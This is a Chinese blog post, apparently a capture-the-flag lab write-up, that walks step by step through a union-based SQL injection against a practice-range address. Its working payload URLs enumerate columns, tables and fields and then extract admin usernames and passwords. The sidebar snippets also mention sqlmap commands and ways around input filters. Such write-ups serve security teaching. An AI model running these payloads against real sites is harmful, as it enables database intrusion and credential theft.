CTF刷题--SQL注入

最新推荐文章于 2024-05-16 02:47:32 发布
最新推荐文章于 2024-05-16 02:47:32 发布
阅读量414 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43882862/article/details/119672062
版权

靶场第1题,SQL注入

题目

在这里插入图片描述
链接:http://59.63.200.79:8003/

解题思路

打开链接,发现是一个网站,里面有个点击新闻,尝试点开。。。。
在这里插入图片描述
点开以后,域名变为:http://59.63.200.79:8003/?id=1
怀疑是不是有数字型SQL注入呢?
构造payload试一试
在这里插入图片描述
使用hackbar构造payload and 1=1,发现回显成功。。
在这里插入图片描述
构造and 1=2,发现回显失败。。所以判定为数字型SQL注入。下面开始SQL联合注入。。。
在这里插入图片描述
第一步:判断字段数
构造payload :http://59.63.200.79:8003/?id=1 order by 2#
回显成功,说明数据库有两个字段(列)
在这里插入图片描述
第二步:判断回显位置(方便获取数据库信息)
构造payload: http://59.63.200.79:8003/?id=1 and 1=2 union select 1,2
获取到显示位
在这里插入图片描述
第三步:获取当前数据库信息
构造payload:
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()#
在这里插入图片描述
第四步:获取数据库表
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
发现admin表,这个表中一般存放账号和密码
在这里插入图片描述

第五步:获取字段
构造 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’#
在这里插入图片描述
第六步:获取数据
构造获取用户名:http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(username) from admin#
在这里插入图片描述
构造获取密码:http://59.63.200.79:8003/?id=1 and 1=2 union select 1,group_concat(password) from admin#
在这里插入图片描述

chenhui9898
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFer成长之路之CTF中的SQL注入
自强不息
02-20 1447
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
CTF-SQL注入
weixin_44770698的博客
06-16 4977
CTF-SQL注入题目整理
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84968222的博客
05-16 725
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
ctf-web-sql注入
热门推荐
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
南邮CTF--SQL注入
weixin_34219944的博客
05-18 311
南邮CTF--SQL注入题 题目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入 2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功 3.继续改参数,1=2时,没有任何信息,找到注入点 4.利用order by 查询列数,当查询2时,显...
CTF刷题总结(1)------简单的SQL注入
qq_45047250的博客
04-25 1278
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单的sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单的sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件名
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
My-CTF-Challenges
05-16
我的CTF挑战 周大福 名称 语 概括 等级 TCTF2018_决赛 给我看一下贝壳 Java Spring自动绑定/反序列化 中等的
sql注入实战(一)
whiteso的博客
01-19 732
实例靶场 http://59.63.200.79:8003/ http://59.63.200.79:8003/?id=1 and 1=1 order by 3 http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database() http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_sc
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5037
Ctfhub解题 web SQL注入
实验吧 ctf 简单的sql注入3
ZweLL032的博客
03-11 6848
ctf题 现在自己还是个小白 以后慢慢做题得出思路吧
bugku ctf平台之sql注入1 write up
l3oog1e的博客
05-25 4470
题目链接  : http://103.238.227.13:10087/ //过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','orde
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 313
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
南邮ctf mysql_南邮CTF--SQL注入
weixin_28692867的博客
02-01 146
南邮CTF--SQL注入题题目:GBK SQL injection解析:1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功3.继续改参数,1=2时,没有任何信息,找到注入点4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显...
第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
weixin_44722125的博客
05-14 2711
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or的两边要有单引号,使它变成password=‘xxx’ or 'xxx’的形式,那么可以根据32位16进制的字符串来查找‘or’对应的16进制是276f7227,所以我们的目标就是要找一个字符串取3...
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值